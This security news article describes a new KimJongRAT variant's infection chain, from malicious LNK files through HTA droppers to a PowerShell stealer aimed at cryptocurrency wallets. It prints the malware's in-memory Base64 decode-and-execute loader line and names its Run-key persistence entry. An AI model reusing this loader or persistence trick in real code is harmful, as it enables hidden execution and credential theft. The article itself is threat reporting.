A sophisticated evolution of the KimJongRAT malware family has emerged, demonstrating advanced techniques for credential theft and system compromise through weaponized Windows shortcut files and PowerShell-based payloads.
This latest campaign represents a significant advancement from previous variants, incorporating both Portable Executable (PE) and PowerShell implementations that specifically target cryptocurrency wallet extensions and sensitive browser data.
The malware’s multi-stage deployment architecture leverages legitimate content delivery network services to mask malicious activities, making detection considerably more challenging for traditional security solutions.
.png
)
The attack begins with deceptively named LNK files, such as “성범죄자 신상정보 고지.pdf.lnk”, suggesting the campaign may be targeting Korean-speaking users with social engineering tactics designed to exploit public safety concerns.
These initial files serve as sophisticated downloaders that establish the foundation for a complex infection chain involving multiple file types and deployment stages.
Palo Alto Networks researchers identified that this new variant represents a substantial departure from the original KimJongRAT stealer first documented in 2013, incorporating modern evasion techniques and expanded targeting capabilities.
The malware’s developers have demonstrated remarkable adaptability, continuously updating their tools to bypass current security measures while expanding their focus to include the lucrative cryptocurrency sector.
The research reveals two distinct implementation approaches: a traditional PE variant and an innovative PowerShell-based version, both designed to maximize data exfiltration while maintaining persistence on infected systems.
.webp)
The economic implications of this campaign are particularly concerning given the malware’s extensive focus on cryptocurrency wallet extensions, with the PowerShell variant targeting over 40 different browser extensions including MetaMask, Trust Wallet, Exodus Web3 Wallet, and numerous other popular cryptocurrency management tools.
This comprehensive targeting approach suggests the attackers are well-informed about the cryptocurrency ecosystem and are positioning themselves to capitalize on the growing adoption of digital assets among both individual users and organizations.
Multi-Stage Infection Mechanism and Payload Deployment
The infection mechanism employed by this KimJongRAT variant demonstrates sophisticated understanding of Windows security architecture and user behavior patterns.
Upon execution, the initial LNK file utilizes legitimate Windows utilities including cmd.exe and curl.exe to download an HTA (HTML Application) file from attacker-controlled accounts on cdn.glitch.global, a legitimate CDN service.
This approach provides several advantages for the attackers, including the ability to host malicious content on trusted infrastructure while avoiding direct attribution to their own servers.
The downloaded HTA file, typically named either “pdf.hta” or “sfmw.hta” depending on the variant, contains obfuscated VBScript code alongside multiple Base64-encoded payloads embedded within the file structure.
The PowerShell variant’s HTA file specifically drops two critical components: a decoy PDF document designed to maintain the illusion of legitimate content, and a ZIP archive containing the actual malware components.
The decoy documents often relate to Korean administrative forms, reinforcing the apparent geographic targeting of this campaign.
.webp)
The ZIP archive extraction reveals a carefully orchestrated deployment system comprising four distinct files: “1.ps1” (PowerShell loader), “1.log” (Base64-encoded stealer), “1.vbs” (persistence mechanism), and “2.log” (keylogger module).
The PowerShell loader employs a simple yet effective technique, utilizing the Invoke-Expression cmdlet to decode and execute the Base64-encoded stealer directly in memory, as demonstrated by the code snippet: iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content $args)))).
The stealer component implements comprehensive anti-analysis measures, including VMware detection through UUID examination and automatic deletion of malicious files when virtual machine environments are detected.
The malware establishes persistence through Windows registry modification, creating an entry under “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” with the key “WindowsSecurityCheck” that ensures automatic execution upon system startup.
This persistence mechanism, combined with the malware’s ability to operate entirely through legitimate system utilities and PowerShell, makes detection through traditional signature-based methods extremely difficult while providing attackers with long-term access to compromised systems.
Automate threat response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs across all endpoints -> Request full access
